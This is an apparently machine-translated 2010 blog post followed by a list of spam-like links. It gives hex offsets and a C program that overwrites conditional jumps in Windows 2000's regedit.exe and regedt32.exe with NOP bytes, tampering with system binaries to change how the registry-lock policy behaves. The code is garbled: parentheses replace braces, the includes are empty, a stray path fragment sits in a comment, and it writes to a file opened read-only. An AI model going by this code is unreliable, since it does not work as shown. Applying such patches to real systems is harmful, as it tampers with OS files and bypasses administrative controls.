Wednesday, July 21, 2010

Ultimate registry operations - lock registry



Have you met the registry is locked and can not open the registry to manually fix it? Many people have it for this headache, I think you know that he is locked once the operating principles of:

Changes [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrent
VersionPoliciesSystem] DisableRegistryTools value of 1 under

There are several methods to unlock, such as program with the API function call to delete the registry directly, make a REG file to import directly, write a script ... ... ... ...

Today I will teach you to write a program to achieve an alternative lock, is not it curious? Come with me.

Experimental Environment: windows2000
Experiment: Lock the registry (use this method to achieve Cracker ideas, direct the program to modify the program instructions to call the registry program prohibited.)
Implementation: C program

First of all we have to disassemble the idea according to Cracker WINNT regedit.exe and regedt32.exe found under the jump, how to get this information is not our purpose today, I will not detail here, and the following is a compilation I found anti-jump change of address:
1.regedit.exe
Offset Address: 0x69CA the command: 0x74 0x1A modified to: 0x90 0x90

2.regedt32.exe
Offset Address: 0x10bf2 the command: 0x74 0x52 changed to: 0x90 0x90

Now we use the program addresses these two commands to modify the offset into 0x90 0x90 (0x90 behalf nop, is to let the program do nothing, the next instruction) Let us see how the program achieved it.

# Include
# Include
bool scanreg (const char * file, long offset, int length, char * the); / * Function Description * /

main ()
(
char the [] = (0x90, 0x90);
scanreg ("C: \ WINNT \ regedit.exe", 0x69CA, 0x02, the); / * call the function to modify winnt regedit.exe under which the 0x02 is the modification length * /
scanreg ("C: \ WINNT \ ServicePackFiles \ i386 \ regedit.exe", 0x69CA, 0x02, the); / * call the function to change the patch under the regedit.exe * /
scanreg ("C: \ WINNT \ system32 \ regedt32.exe", 0x10bf2, 0x02, the); / * call the function to modify system32 under regedt32.exe backup / bin / conf / data / log / maint / svn / tmp /
scanreg ("C: \ WINNT \ ServicePackFiles \ i386 \ regedt32.exe", 0x10bf2, 0x02, the); / * call the function to change the patch under the regedt32.exe * /
)
bool scanreg (const char * file, long offset, int length, char * the)
(
FILE * fp = NULL;
bool result = false;
if ((fp = fopen (file, "rb "))!= NULL) / * Open the file for read and write operations * /
(
fseek (fp, offset, 1); / * the pointer to our definition of offset address * /
fwrite (the, length, 1, fp); / * modify the program, the instruction replaced by 0x90 * /
fclose (fp); / * Close file * /
result = true;
)
return (result);
)

Well, I have here is just a demonstration, only for 2000 system, the windows registry every system call procedures to analyze and then use the API function in the program begin GetVersionEx (LPOSVERSIONINFO lpVersionInfo) to judge the system, according to judge the system calls the corresponding modification function. That is not to kill windows through it? Above, the method of announcing to everyone do well against.







Recommended links:



Comment Puzzle And Word Games



CPU chip with independent intellectual property rights through the acceptance of Godson 2E



ps3 format



Flac To Mp3



Hope PS3 Mobile Converter



Vacations DVD to Apple TV



Shop REGISTRY Tools



Century Through to bring Austria into the blowout UMPC OQO incoming year



mp4 3gp Video converter



Infomation File And Disk MANAGEMENT



Youtube to DAT Today



Review Calculators And Converters



Charles Zhang: Sohu is looking for the next opponent



Three STRATEGIES to help you get started WinRAR



Unicom Frankly Difficult To Govern Without Legal Constraint SP Is Critical Violations



DTAB



.mkv files



No comments:

Post a Comment